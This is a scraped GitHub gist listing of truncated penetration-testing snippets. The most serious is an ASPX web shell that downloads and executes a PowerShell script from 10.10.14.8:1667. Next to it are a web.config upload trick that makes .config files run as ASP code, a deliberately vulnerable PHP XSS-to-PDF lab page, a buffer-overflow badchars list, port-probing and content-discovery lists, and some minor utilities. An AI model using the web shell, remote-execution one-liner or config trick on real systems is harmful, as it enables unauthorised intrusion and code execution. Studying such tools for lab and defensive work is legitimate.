This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| # Before starting this lab make sure wkhtmltopdf is installed. | |
| header("Content-Type: text/html"); | |
| $bad = "script"; | |
| $param = $_GET["xss"]; | |
| echo "Printing your payload on pdf file sur ;_;</br>"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $file = 'test.pdf'; | |
| $filename = 'test.pdf'; /* Note: Always use .pdf at the end. */ | |
| header('Content-type: application/pdf'); | |
| header('Content-Disposition: inline; filename="' . $filename . '"'); | |
| header('Content-Transfer-Encoding: binary'); | |
| header('Content-Length: ' . filesize($file)); | |
| header('Accept-Ranges: bytes'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| | httprobe -p https:10000 -p https:1010 -p https:1085 -p https:11371 -p https:12443 -p https:1311 -p https:1414 -p https:14439 -p https:16080 -p https:1776 -p https:18091 -p https:18092 -p https:2031 -p https:20720 -p https:20790 -p https:2082 -p https:2087 -p https:2095 -p https:2096 -p https:21011 -p https:21012 -p https:21021 -p https:21022 -p https:2381 -p https:24465 -p https:2480 -p https:280 -p https:28017 -p https:300 -p https:3000 -p https:311 -p https:3128 -p https:3333 -p https:3702 -p https:4125 -p https:4243 -p https:4444 -p https:4567 -p https:4711 -p https:4712 -p https:4847 -p https:4993 -p https:5000 -p https:5010 -p https:5104 -p https:5108 -p https:5280 -p https:5357 -p https:5433 -p https:5800 -p https:591 -p https:593 -p https:6543 -p https:7000 -p https:7002 -p https:7396 -p https:7474 -p https:8000 -p https:8001 -p https:8008 -p https:8011 -p https:8014 -p https:8042 -p https:8069 -p https:8080 -p https:8081 -p https:8086 -p https:8088 -p https:8090 -p https:8091 -p https:81 -p https:81 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| badchars = ( | |
| "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" | |
| "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" | |
| "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" | |
| "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" | |
| "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" | |
| "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" | |
| "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" | |
| "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" | |
| "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| FS=$'\n' | |
| old_pr=$(ps -eo command) | |
| while true; do | |
| new_pr=$(ps -eo command) | |
| diff <(echo "$old_pr") <(echo "$new_pr") | grep [\<\>] | |
| sleep 1 | |
| old_pr=$new_pr | |
| done |
Splint3r7
/ ruby-open-uri-request.rb
Created
July 30, 2019 13:44
— forked from PWSdelta/ruby-open-uri-request.rb
4-line Ruby script that uses open-uri to fetch the contents of a URL & displays it in the console. This is the foundation for all web requests, whether to scrape a page, request a JSON response, and more.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # http://ruby-doc.org/stdlib-2.0.0/libdoc/open-uri/rdoc/OpenURI.html | |
| require 'open-uri' | |
| # Go fetch the contents of a URL & store them as a String | |
| response = open('http://www.example.com').read | |
| # "Pretty prints" the result to look like a web page instead of one long string of HTML | |
| URI.parse(response).class | |
| # Print the contents of the website to the console |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //simple aspx shell to execute commands | |
| <% | |
| Set s = CreateObject("WScript.Shell") | |
| Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.8:1667/shell.ps1')") | |
| o = cmd.StdOut.Readall() | |
| Response.write(o) | |
| %> |
Splint3r7
/ web.config
Created
July 8, 2019 09:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> |
Splint3r7
/ href-urls.sh
Created
June 13, 2019 16:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html | |
| cat $1 | while read urls; do | |
| echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html | |
| done |
Splint3r7
/ content_discovery_all.txt
Created
May 5, 2019 11:00
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |